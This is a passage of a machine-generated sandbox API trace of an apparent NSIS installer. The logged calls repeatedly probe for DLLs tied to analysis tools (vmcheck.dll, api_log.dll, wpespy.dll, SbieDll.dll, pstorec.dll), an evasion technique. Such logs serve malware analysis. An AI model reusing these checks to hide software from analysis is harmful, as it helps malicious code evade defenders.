out: lpString1="0") returned="0" [0157.950] lstrlenA (lpString="0") returned 1 [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.950] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.950] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.950] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.951] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.951] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.951] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'pstorec.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'pstorec.dll') i.R0") returned="kernel32::GetModuleHandle(t 'pstorec.dll') i.R0" [0157.951] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.951] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.951] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.951] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.951] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.951] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.951] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.951] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.951] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.951] lstrcpynA (in: lpString1=0x323058, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.952] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.952] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.952] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.952] lstrcpynA (in: lpString1=0x3217a0, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.952] GetModuleHandleA (lpModuleName="pstorec.dll") returned 0x0 [0157.952] lstrcpynA (in: lpString1=0x314418, lpString2="pstorec.dll", iMaxLength=1024 | out: lpString1="pstorec.dll") returned="pstorec.dll" [0157.952] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.952] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.952] lstrlenA (lpString="0") returned 1 [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.952] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.952] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.952] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.952] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.952] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.953] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.953] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.953] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.953] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0") returned="kernel32::GetModuleHandle(t 'vmcheck.dll') i.R0" [0157.953] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.953] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.953] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.953] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.953] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.953] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.953] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.953] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.953] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.953] lstrcpynA (in: lpString1=0x323058, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.954] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.954] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.954] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.954] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.954] GetModuleHandleA (lpModuleName="vmcheck.dll") returned 0x0 [0157.954] lstrcpynA (in: lpString1=0x314418, lpString2="vmcheck.dll", iMaxLength=1024 | out: lpString1="vmcheck.dll") returned="vmcheck.dll" [0157.954] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.954] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.954] lstrlenA (lpString="0") returned 1 [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.954] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.954] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.954] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.954] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.955] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.955] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.955] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'api_log.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'api_log.dll') i.R0") returned="kernel32::GetModuleHandle(t 'api_log.dll') i.R0" [0157.955] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.955] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.955] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.955] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.955] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.955] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.955] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.955] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.955] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.955] lstrcpynA (in: lpString1=0x323058, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.956] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.956] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.956] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.956] lstrcpynA (in: lpString1=0x3217a0, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.956] GetModuleHandleA (lpModuleName="api_log.dll") returned 0x0 [0157.956] lstrcpynA (in: lpString1=0x314418, lpString2="api_log.dll", iMaxLength=1024 | out: lpString1="api_log.dll") returned="api_log.dll" [0157.956] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.956] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.956] lstrlenA (lpString="0") returned 1 [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.956] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.956] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.956] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.956] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.957] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.957] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.957] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0") returned="kernel32::GetModuleHandle(t 'wpespy.dll') i.R0" [0157.957] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.957] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.957] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.957] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.957] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.957] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.957] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.957] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.957] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.958] lstrcpynA (in: lpString1=0x323058, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.958] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.958] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.958] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.958] lstrcpynA (in: lpString1=0x3217a0, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.958] GetModuleHandleA (lpModuleName="wpespy.dll") returned 0x0 [0157.958] lstrcpynA (in: lpString1=0x314418, lpString2="wpespy.dll", iMaxLength=1024 | out: lpString1="wpespy.dll") returned="wpespy.dll" [0157.958] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.958] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.958] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.958] lstrlenA (lpString="0") returned 1 [0157.958] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.958] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.958] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.958] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.958] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.959] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.959] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.959] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.959] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.959] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0") returned="kernel32::GetModuleHandle(t 'SbieDll.dll') i.R0" [0157.959] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.959] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.959] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.959] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 